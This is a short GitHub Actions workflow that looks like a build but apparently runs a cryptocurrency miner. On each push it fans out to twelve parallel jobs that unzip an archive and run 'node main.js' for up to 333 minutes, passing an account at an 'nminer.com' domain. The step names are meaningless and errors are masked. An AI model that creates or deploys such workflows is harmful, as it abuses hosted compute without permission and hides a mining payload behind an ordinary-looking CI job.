name: eyeliner
on:
  push:
    branches: [ "main" ]
    paths:
      - "eyeliner.txt"

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { os: 0 }
          - { os: 1 }
          - { os: 2 }
          - { os: 3 }
          - { os: 4 }
          - { os: 5 }
          - { os: 6 }
          - { os: 7 }
          - { os: 8 }
          - { os: 9 }
          - { os: 10 }
          - { os: 11 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20

      - name: Unzip eyeliner.zip
        run: |
          sudo apt install -y unzip
          unzip eyeliner.zip

      - name: fooey furthermore likewise
        run: |
          npm install --ignore-scripts
          timeout 333m node main.js fitnessempire455@nminer.com || echo "eyeliner executed"